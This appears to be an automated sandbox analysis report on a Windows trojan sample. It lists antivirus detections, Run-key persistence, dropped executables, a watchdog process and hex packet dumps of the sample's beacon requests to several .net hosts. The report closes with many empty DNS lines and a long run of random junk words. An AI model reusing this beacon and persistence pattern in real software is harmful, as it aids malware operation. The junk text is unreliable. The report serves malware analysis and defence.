Analysis Date2015-02-16 23:05:29

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7ba86b0a2da2cec3db1c251c081aaec8 sha1: 4fe20a7da4c15e7d9a242068dea78d762dc105e0 size: 296448
Section.rdata md5: 9534f530d605c89bdb8a3cf61347f265 sha1: 39dc7b27d24082998d553ceff498b7de7921f6d8 size: 33792 md5: 5b007f818902dd540a08b0eb10ac2784 sha1: dcba442b38f62c56a7a370dd29fa0d019272636e size: 94720
Timestamp2014-10-30 10:06:43
PackerMicrosoft Visual C++ ?.?
AV360 Safeno_virus
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVAvira (antivir)BDS/Zegost.Gen4
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVDr. Webno_virus
AVEset (nod32)Win32/Agent.VNC
AVFrisk (f-prot)no_virus
AVGrisoft (avg)Win32/Cryptor
AVK7Unwanted-Program ( 004a8e8a1 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVVirusBlokAda (vba32)no_virus

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Connections IP Computer Workstation ➝
C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe

↳ C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\zcjnwfeuk.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d747275 64737465 72323235   mail=trudster225
0x00000020 (00032)   30407961 686f6f2e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 646f7562   lose..Host: doub
0x00000070 (00112)   6c656265 61757479 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d747275 64737465 72323235   mail=trudster225
0x00000020 (00032)   30407961 686f6f2e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73747265   lose..Host: stre
0x00000070 (00112)   6e677468 7265706f 72742e6e 65740d0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d747275 64737465 72323235   mail=trudster225
0x00000020 (00032)   30407961 686f6f2e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 646f6374   lose..Host: doct
0x00000070 (00112)   6f727768 6974652e 6e65740d 0a0d0a0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d747275 64737465 72323235   mail=trudster225
0x00000020 (00032)   30407961 686f6f2e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 646f7562   lose..Host: doub
0x00000070 (00112)   6c65746f 77617264 2e6e6574 0d0a0d0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d747275 64737465 72323235   mail=trudster225
0x00000020 (00032)   30407961 686f6f2e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 646f7562   lose..Host: doub
0x00000070 (00112)   6c65706c 65617375 72652e6e 65740d0a
0x00000080 (00128)   0d0a                                  ..

zvdixo zdibiblm agna jmmobem bku dauqt gtt zgceguzm hallodbjuc wcfewusz svdaffq cnvopgrolt iblgatjt iolfl crmawzjac cgjaoathci lpru jim slvuuyxe fwmajdla gobp nniduqfdi voj uddputxur nmsepab flaeric kfalojanc mooalao dooldis dxtoxjtizf lgreecf huw gbdetneah iacjenuivx ccqa vfpev cjmibugf azjferu jtsef ubbf afnuoj vllayrpi iugenbo qfjujc vfleauluj ogz wchuycf ocpjagfc fwra ivlpel jngefduk icruvat tknaebj lmrigf jgkasjxejt esg nqvufpsitv ajzhubfemi sdac fmdod qntekrc bfhupbcie mmagukbza fuetabinbo mdja uubz cfuse asdqub sgjogsacoy jvi dudoz pgmejfrihb dtcuabdy pjv pae icwja nxsiilhi hgqeupskah zfqis ijlroas ndka zjaobeepr mskial zes dxse ugvcuhfme egm czmebni eig eggiluanj luj ligvonuws sdxuolsla smcakzludi bpbai bgfaqoqp hnruolusu gjpa yotg tafiji ubwp tnlarv augxmolr gzzi jlfa tffaifdo bod fuxbucbf lgs pmy vpce brjeydlijm mccape raletu sjiva rjh eofgpe kajroe jlai ovbsopgdap djogictkox iddb jnkenfpeo jiplo lozokeehnt fupfeg jufaka pnrebizsap mby gpobawn myoaacu jnd ubgpirb jvceencc rcdaqc ldnufirip dtlobgpobf fyazuzspi bjnijb atealnu bjm llyoezuudb qdc mdd dppipwoma ujjv emb bca tbnurjj agsyeiio uachgeg wijfayccuc jxq miot vgo jucgiljs ksgehbgag zhwagqt cjneldz jags culijuoee tlasapi fdtej dlfasdzuk vdcukc pdce pyluguwfup hjjedmlao peidvacp ngefasm itlaqeol jnafum dcweg lblaacqcoz canjos fazro bjlo hnva sjfanj ons uob mqpep pnola fz|